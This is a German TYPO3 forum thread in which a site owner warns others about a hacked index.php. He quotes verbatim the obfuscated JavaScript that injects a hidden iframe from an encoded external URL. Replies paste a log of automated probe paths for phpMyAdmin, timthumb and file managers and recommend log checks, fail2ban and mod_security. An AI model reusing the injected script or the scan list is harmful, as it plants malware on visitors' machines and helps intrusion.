TYPO3-Testaccount
Testen Sie die aktuellste TYPO3-Version kostenlos und unverbindlich für einen Monat!

Jetzt testen!

Schulungen

jetzt buchen
Forum » TYPO3 CMS: Installationsprobleme » Sonstiges

TYPO3 "index.php" gehackt


Autor Nachricht
Verfasst am: 22. 03. 2012 [09:36]
pow
Themenersteller
Dabei seit: 30.10.2008
Beiträge: 719
 Hallo T3'ler,

heute musste ich mit erschrecken feststellen das meine Seite gehackt wurde.
Zum glück nur minimal und ich konnte den "hack" gleich finden.

In der index.php (root) war folgende Zeile:

HTML
<script>var GlK = '06606503b06606506806606506506606507106606506006606506c06606506406606501f06606507206606507106606506206606503c06606502106606502106606501f06606507606606506806606506306606507306606506706606503c06606502106606503006606502106606501f06606506706606506406606506806606506606606506706606507306606503c06606502106606503006606502106606501f06606506806606506306606503c06606502106606507806606504006606506106606502106606501f06606506506606507106606506006606506c06606506406606506106606506e06606507106606506306606506406606507106606503c06606502106606502f06606502106606503d06606503b06606502e06606506806606506506606507106606506006606506c06606506406606503d';function tSc(uEZ,w1,w2){var gwl='';arr=uEZ.split('0'+w1+'0'+w2+'0');for(i=1; i<arr.length; i++){ gwl+='%'+(parseInt(arr[i], 16)+1).toString(16);}return gwl;} var MvX=unescape;document.write(MvX(tSc(GlK,'66','65')));document.getElementById('yAb').src = MvX(tSc('02f03906702f03907302f03907302f03906f02f03903902f03902e02f03902e02f03903002f03903302f03903502f03902d02f03903002f03903702f03903402f03902d02f03903102f03903302f03903802f03902d02f03903002f03903502f03903802f03902e02f03907202f03907502f03902e02f03906202f03906e02f03907402f03906d02f03907302f03902d02f03906f02f03906702f03906f02f03903e02f03906002f03906302f03906302f03903c02f039030','2f','39'));</script>


Alles ist auf CHMOD 644?
Konnte dies evtl. durch eine Alpha/Beta Extension zustandekommen?

Was das Script macht, ist einen iFrame am Ende der Webseite zu platzieren. Man bemerkt es spätestens wenn man seine Seite/ sein Projekt besucht und eine Viruswarnung auftaucht.

Dies ist weniger eine Frage, sondern eine Warnung, damit alle Ihre index.php prüfen.

Grüße
Profil
Verfasst am: 22. 03. 2012 [11:10]
LuP
Dabei seit: 12.04.2007
Beiträge: 491
 Hallo pow,

Hast Du alle Logs geprüft? FTP, Apache? Wichtig ist es zu wissen,
wann die Änderung stattgefunden hat und wie sie zustande kam.
Infizierter PC und gehackter FTP Account wären nicht auszuschließen.
Suspekte/verwundbare Erweiterungen direkt an das Security-Team melden.
Auch solltest Du künftig Integritätsprüfungen und Intrusion detection in Erwägung ziehen.

VG,
LuP

[Dieser Beitrag wurde 1mal bearbeitet, zuletzt am 22.03.2012 um 11:12.]
Profil
Verfasst am: 22. 03. 2012 [11:15]
igorshmigor
Dabei seit: 17.03.2006
Beiträge: 942
 Übel, gerade vor kurzem war hier schon ein Beitrag über eine gehackte TYPO3-Seite und bei einem meiner Kunden wurde auch ein Versuch gestartet. Was geht denn ab zur Zeit?
Danke für die Warnung.
http://www.pascalcollins.de
http://twitter.com/#!/igorshmigor
ProfilWWW
Verfasst am: 22. 03. 2012 [20:34]
Chrissli
Dabei seit: 19.04.2010
Beiträge: 503
 Kurze Frage:

du verwendest die aktuelle Version? Oder wurde evtl. "nur" eine schon bekannte Lücke in einer älteren Version ausgenutzt??
God's in his Heaven -
All's right with the world!
ProfilICQ
Verfasst am: 24. 03. 2012 [16:41]
homy
Dabei seit: 23.03.2012
Beiträge: 52
 Was nutzt ihr für Formulare? Evtl. ist hier die Lücke.
MFG
de Homy icon_cool.gif
ProfilSkype
Verfasst am: 25. 03. 2012 [16:53]
skydivematy
Dabei seit: 06.11.2008
Beiträge: 276
 Da es ums Hacken geht möcht ich Euch mal mein Realurl Errorlog von einer Zeitspanne von 4 wochen Zeigen. Alles Einträge mit Dubiosen Web Anfragen einer Webseite eines Bekannten die ich Pflege.
TYPOSCRIPT
de/kontakt/gb.php
scripts/setup.php
admin/scripts/setup.php
admin/pma/scripts/setup.php
admin/phpmyadmin/scripts/setup.php
db/scripts/setup.php
dbadmin/scripts/setup.php
myadmin/scripts/setup.php
mysql/scripts/setup.php
mysqladmin/scripts/setup.php
phpadmin/scripts/setup.php
phpMyAdmin/scripts/setup.php
phpmyadmin/scripts/setup.php
phpmyadmin1/scripts/setup.php
phpmyadmin2/scripts/setup.php
pma/scripts/setup.php
web/phpMyAdmin/scripts/setup.php
xampp/phpmyadmin/scripts/setup.php
web/scripts/setup.php
php-my-admin/scripts/setup.php
websql/scripts/setup.php
phpMyAdmin-2/scripts/setup.php
phpMyAdmin-2.2.3/scripts/setup.php
phpMyAdmin-2.2.6/scripts/setup.php
phpMyAdmin-2.5.1/scripts/setup.php
phpMyAdmin-2.5.4/scripts/setup.php
phpMyAdmin-2.5.5-rc1/scripts/setup.php
phpMyAdmin-2.5.5-rc2/scripts/setup.php
phpMyAdmin-2.5.5/scripts/setup.php
phpMyAdmin-2.5.5-pl1/scripts/setup.php
phpMyAdmin-2.5.6-rc1/scripts/setup.php
phpMyAdmin-2.5.6-rc2/scripts/setup.php
phpMyAdmin-2.5.6/scripts/setup.php
phpMyAdmin-2.5.7/scripts/setup.php
phpMyAdmin-2.5.7-pl1/scripts/setup.php
phpMyAdmin-2.6.0-alpha/scripts/setup.php
phpMyAdmin-2.6.0-alpha2/scripts/setup.php
phpMyAdmin-2.6.0-beta1/scripts/setup.php
phpMyAdmin-2.6.0-beta2/scripts/setup.php
phpMyAdmin-2.6.0-rc1/scripts/setup.php
phpMyAdmin-2.6.0-rc2/scripts/setup.php
phpMyAdmin-2.6.0-rc3/scripts/setup.php
phpMyAdmin-2.6.0/scripts/setup.php
phpMyAdmin-2.6.0-pl1/scripts/setup.php
phpMyAdmin-2.6.0-pl2/scripts/setup.php
phpMyAdmin-2.6.0-pl3/scripts/setup.php
phpMyAdmin-2.6.1-rc1/scripts/setup.php
phpMyAdmin-2.6.1-rc2/scripts/setup.php
phpMyAdmin-2.6.1/scripts/setup.php
phpMyAdmin-2.6.1-pl1/scripts/setup.php
phpMyAdmin-2.6.1-pl2/scripts/setup.php
phpMyAdmin-2.6.1-pl3/scripts/setup.php
phpMyAdmin-2.6.2-rc1/scripts/setup.php
phpMyAdmin-2.6.2-beta1/scripts/setup.php
phpMyAdmin-2.6.2/scripts/setup.php
phpMyAdmin-2.6.2-pl1/scripts/setup.php
phpMyAdmin-2.6.3/scripts/setup.php
phpMyAdmin-2.6.3-rc1/scripts/setup.php
phpMyAdmin-2.6.3-pl1/scripts/setup.php
phpMyAdmin-2.6.4-rc1/scripts/setup.php
phpMyAdmin-2.6.4-pl1/scripts/setup.php
phpMyAdmin-2.6.4-pl2/scripts/setup.php
phpMyAdmin-2.6.4-pl3/scripts/setup.php
phpMyAdmin-2.6.4-pl4/scripts/setup.php
phpMyAdmin-2.6.4/scripts/setup.php
phpMyAdmin-2.7.0-beta1/scripts/setup.php
phpMyAdmin-2.7.0-rc1/scripts/setup.php
phpMyAdmin-2.7.0-pl1/scripts/setup.php
phpMyAdmin-2.7.0-pl2/scripts/setup.php
phpMyAdmin-2.7.0/scripts/setup.php
phpMyAdmin-2.8.0-beta1/scripts/setup.php
phpMyAdmin-2.8.0-rc1/scripts/setup.php
phpMyAdmin-2.8.0-rc2/scripts/setup.php
phpMyAdmin-2.8.0/scripts/setup.php
phpMyAdmin-2.8.0.1/scripts/setup.php
phpMyAdmin-2.8.0.2/scripts/setup.php
phpMyAdmin-2.8.0.3/scripts/setup.php
phpMyAdmin-2.8.0.4/scripts/setup.php
phpMyAdmin-2.8.1-rc1/scripts/setup.php
phpMyAdmin-2.8.1/scripts/setup.php
phpMyAdmin-2.8.2/scripts/setup.php
sqlmanager/scripts/setup.php
mysqlmanager/scripts/setup.php
p/m/a/scripts/setup.php
PMA2005/scripts/setup.php
pma2005/scripts/setup.php
phpmanager/scripts/setup.php
php-myadmin/scripts/setup.php
phpmy-admin/scripts/setup.php
webadmin/scripts/setup.php
sqlweb/scripts/setup.php
webdb/scripts/setup.php
mysql-admin/scripts/setup.php
databaseadmin/scripts/setup.php
admm/scripts/setup.php
admn/scripts/setup.php
index.php
admin/index.php
admin/pma/index.php
admin/phpmyadmin/index.php
db/index.php
dbadmin/index.php
myadmin/index.php
mysqladmin/index.php
phpadmin/index.php
phpMyAdmin/index.php
phpmyadmin/index.php
phpmyadmin1/index.php
phpmyadmin2/index.php
pma/index.php
web/phpMyAdmin/index.php
xampp/phpmyadmin/index.php
web/index.php
php-my-admin/index.php
websql/index.php
phpMyAdmin-2/index.php
phpMyAdmin-2.2.3/index.php
phpMyAdmin-2.2.6/index.php
phpMyAdmin-2.5.1/index.php
phpMyAdmin-2.5.4/index.php
phpMyAdmin-2.5.5-rc1/index.php
phpMyAdmin-2.5.5-rc2/index.php
phpMyAdmin-2.5.5/index.php
phpMyAdmin-2.5.5-pl1/index.php
phpMyAdmin-2.5.6-rc1/index.php
phpMyAdmin-2.5.6-rc2/index.php
phpMyAdmin-2.5.6/index.php
phpMyAdmin-2.5.7/index.php
phpMyAdmin-2.5.7-pl1/index.php
photo-gallery/www.calypsodivecenter.com
FCKeditor/editor//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
admin/fckeditor/editor//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
admin/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
ajaxfilemanager/jscripts/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
faq/admin/editor//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
fckeditor/editor//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
gallery/zp-core/zp-extensions/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
includes/fckeditor/editor//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
includes/tinymce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
javascript/tinymce/jscripts/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
js/jscripts/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
js/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
jscripts/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
main/inc/lib/fckeditor/editor//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
photo/zp-core/zp-extensions/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
scripts/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
shop/admin/includes/javascript/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
zen/zp-core/zp-extensions/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
zenphoto/zp-core/zp-extensions/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
/themes/Calypso/Calypso/timthumb.php
/kontakt//wp-content/themes/Calypso/timthumb.php
/themes/Calypso/timthumb.php
/sitemap//wp-content/themes/Calypso/timthumb.php
register-user/index.php
wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php
wp-content/plugins/wp-phpmyadmin/phpmyadmin/index.php
PMA/index.php
mysql/index.php
sqlmanager/index.php
mysqlmanager/index.php
phpmanager/index.php
webadmin/index.php
sqlweb/index.php
webdb/index.php
mysql-admin/index.php
php-myadmin/index.php
phpmy-admin/index.php


Ich weiss nicht wieviele Deny from ich schon in der .htaccess habe, aber nachdem ich aus einer Liste mit Blacklistet Hacker und Spammer Ip's noch zusätzlich in die .htaccess eingetragen hatte sind solche Webanfragen seit etwa 3 Wochen ausgeblieben.
Aber es Stimmt schon das es in der Letzten Zeit erheblich zugenommen hat.

Dass ist sehr Interessant. Wers noch nicht kennt. http://www.illutzmination.de/security.html

gruss
maty
Profil
Verfasst am: 25. 03. 2012 [16:55]
skydivematy
Dabei seit: 06.11.2008
Beiträge: 276
 Sorry Vergessen. Die Meisten von Diesen Anfragen kommen aus der Ukraine, Russland, China.
Profil
Verfasst am: 26. 03. 2012 [00:32]
Chrissli
Dabei seit: 19.04.2010
Beiträge: 503
 Sorry wenn ich das sage, aber das Scannen von offenen Serverports,
versuchte SSH-Logins mit 08/15-Credentials oder das Aufrufen
von evtl. existierenden Dateien ( seien es PhpMyAdmin, setup-Scripte o.ä. )
ist nichts besonders auffälliges und tritt auch nicht erst seit kurzem auf.

Ich betreue schon seit mehreren Jahren den Server eines Kunden und da nehmen solche
traurigen Versuche etwa 80-90% des Logs ein. Und das da die östlich gelegenen Länder
weit vorne mit dabei sind ist auch ein alter Hut.

Alles in allem hat das aber mit dem eigentlichen Problem nichts zu tun, da immer noch
nicht klar ist, ob es sich um eine Lücke in einer aktuellen Typo-Version handelt oder
"nur" der PC / FTP-Zugang korrupt war oder eine andere, nicht Typo-relevante, Lücke ausgenutzt wurde.
God's in his Heaven -
All's right with the world!
ProfilICQ
Verfasst am: 26. 03. 2012 [21:58]
LutzOMat
Dabei seit: 02.06.2010
Beiträge: 7
 Hallo Chrissli,

natürlich hast Du Recht, dass die klassischen Scans nichts ungewöhnliches sind. Wenn man kein ungeschütztes phpMyAdmin auf dem Server hat und auch sonst nichts "kritisches" kann man das alles ignorieren.

Meine Taktik ist es jedoch, bei jeder auftretenden Ungereimtheit den Besucher rigoros auszusperren. Auch derjenige, der nicht total planlos vorgeht, sondern es speziell auf Typo3 abgesehen hat, erzeugt ein paar Fehler, die es ermöglichen, sein Vorhaben mit fail2ban oder mod_security zu erkennen und unterbinden.

So wird zum Beispiel im noch gerade halbwegs aktuellen Security Beitrag
typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2011-004/
als Lösung eine mod_Security Regel angegeben.

Ich würde den Einsatz von fail2ban / mod_security daher jedem Server-Admin sehr ans Herz legen.

Chrissli schrieb:

Sorry wenn ich das sage, aber das Scannen von offenen Serverports,
versuchte SSH-Logins mit 08/15-Credentials oder das Aufrufen
von evtl. existierenden Dateien ( seien es PhpMyAdmin, setup-Scripte o.ä. )
ist nichts besonders auffälliges und tritt auch nicht erst seit kurzem auf.

Ich betreue schon seit mehreren Jahren den Server eines Kunden und da nehmen solche
traurigen Versuche etwa 80-90% des Logs ein. Und das da die östlich gelegenen Länder
weit vorne mit dabei sind ist auch ein alter Hut.

Alles in allem hat das aber mit dem eigentlichen Problem nichts zu tun, da immer noch
nicht klar ist, ob es sich um eine Lücke in einer aktuellen Typo-Version handelt oder
"nur" der PC / FTP-Zugang korrupt war oder eine andere, nicht Typo-relevante, Lücke ausgenutzt wurde.
ProfilWWW